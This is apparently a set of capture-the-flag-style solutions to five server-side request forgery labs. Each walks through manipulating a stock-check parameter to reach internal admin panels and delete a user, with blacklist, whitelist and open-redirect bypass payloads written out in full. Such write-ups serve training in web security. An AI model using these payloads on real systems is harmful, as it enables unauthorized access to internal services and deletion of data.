# **Basic SSRF against the local server Lab :**

 * **Lab Objective :** ```Access the admin interface at http://localhost/admin and delete the user carlos```

***

 * Navigate Through the app and Click any **View details** , Then go to **Check stock** Functionality and Click it 

 * Open burp and Check **/product/stock** , There is **stockApi** Parameter that retrieves data from internal Servers :

     * Send the Request to The Repeater and Change stockApi URL to the localhost ```http://localhost`` :

         * It retrieved the localhost Contents , Now try to Access Admin Panel ``http://localhost/admin`` :

             * Accessed Successfully :) 

             * Delete carlos => ``http://localhost/admin/delete?username=carlos``  


***
***
***

# **Basic SSRF against another back-end system Lab :**

 * **Lab Objective :** ```Access the admin interface and Delete the user carlos```

 * **Given :** scan the internal 192.168.0.X range for an admin interface on port 8080

***

 * Navigate Through the app and Click any **View details** , Then go to **Check stock** Functionality and Click it 

 * Open burp and Check **/product/stock** , There is **stockApi** Parameter that retrieves data from internal Servers :

     * Send the Request to The Repeater and Change stockApi URL to the localhost ```http://localhost`` :

         * ``Could not connect to external stock check service``

     * Use Givens , Open intruder and scan 192.168.0.x for range of ( 1 : 255 ) at port 8080  : 

         * ``http://192.168.0.4:8080`` is Status Code is 404 :

             * Try to Access Admin Panel ``http://192.168.0.4:8080/admin`` :

                 * Accessed Successfully :)

     * Delete carlos => ``http://192.168.0.4:8080/admin/delete?username=carlos``         



***
***
***

# **SSRF with blacklist-based input filter Lab :**

 * **Lab Objective :** ```Access the admin interface at http://localhost/admin and delete the user carlos``

***

 * Navigate Through the app and Click any **View details** , Then go to **Check stock** Functionality and Click it 

 * Open burp and Check **/product/stock** , There is **stockApi** Parameter that retrieves data from internal Servers :

     * Send the Request to The Repeater and Change stockApi URL to the localhost ```http://localhost`` :

         * ``"External stock check blocked for security reasons"`` , as You there is Blacklist-based input filter , We Need to Search for a Suitable Payload to Bypass this Filtering :

             * Visit ```https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery``` To Find a Suitable Payload :

                 * ```http://127.1``` Accessed Successfully , Now let's Try to Access Admin Panel ``http://127.1/admin`` :

                     * ``"External stock check blocked for security reasons"``

                     * There is Filtering for **admin** Keyword , Let's Try to Bypass this Filtering :

                         * Encode **admin** Keyword (URL-Encoding) %61%64%6d%69%6e :

                             * Rejected ;(

                         * Encode it Again %25%36%31%25%36%34%25%36%64%25%36%39%25%36%65 :

                             * Accessed Successfully :) 


                 * Delete carlos => ``http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos``                     
 


***
***
***

# **SSRF with filter bypass via open redirection vulnerability Lab :**

 * **Lab Objective :** ```Access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos```

 * **Given :** The stock checker has been restricted to only access the local application

***

 * Navigate Through the app and Click any **View details** , There is a **Next product** Button Click it , and Click **Check stock** Button too 

 * Open burp and Check ``/product/nextProduct?currentProductId=1&path=/product?productId=2`` :

     * As You See When You Click ``Next product`` Button there is a ``path`` Parameter Which Redirects to Another Place (Next Product) 

     * This Parameter is effected with Open-redirect vulnerability , So let's Change it to ``path=http://192.168.0.12:8080/admin`` which Will Redirect us to Admin Panel Page 

     * Now Go to **/product/stock** Request and Change **stockApi** Parameter to ```/product/nextProduct?path=http://192.168.0.12:8080/admin``` :

         * Admin Panel Retrieved Successfully :) 

         * Now Delete Carlos => ```/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos```


 * **Another Solution :**

     * We Try to Change the **stockApi** to Access The Admin Panel :

         * We Need to Search for a Suitable Payload to Bypass this Filtering :

             * Visit ```https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery``` To Find a Suitable Payload : 

                 * When You Change the **stockApi** to ```http://[::]``` the Response is ```"Invalid external stock check url 'Illegal character in path at index 26: http://localhost:80http://[::]'"``` , This leaks a Way to Bypass Filtering (Information Disclosure) :

                     * The Server adds The **stockApi** Value after ```https://localhost:80```, So We Can Use **@** With the Given ``http://192.168.0.12:8080/admin`` To Access Admin Panel 
      



***
***
***
 
# **SSRF with whitelist-based input filter Lab :**
   
 * **Lab Objective :** ```Access the admin interface at http://localhost/admin and delete the user carlos``

*** 


 * Navigate Through the app and Click any **View details** , Then go to **Check stock** Functionality and Click it 

 * Open burp and Check **/product/stock** , There is **stockApi** Parameter that retrieves data from internal Servers :

     * Send the Request to The Repeater and Change stockApi URL to the localhost ```http://localhost`` :

         * ``"External stock check host must be stock.weliketoshop.net"``

             * To Bypass this Filtering We Can Inject the Localhost as a User Name at ```stock.weliketoshop.net``` then make it  a comment (fragment) by adding **#** after the localhost :

                 * ```http://localhost#@stock.weliketoshop.net``` :

                     * Encode **#** twice to bypass Filtering  

                 * Now Delete Carlos => ```http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos```    

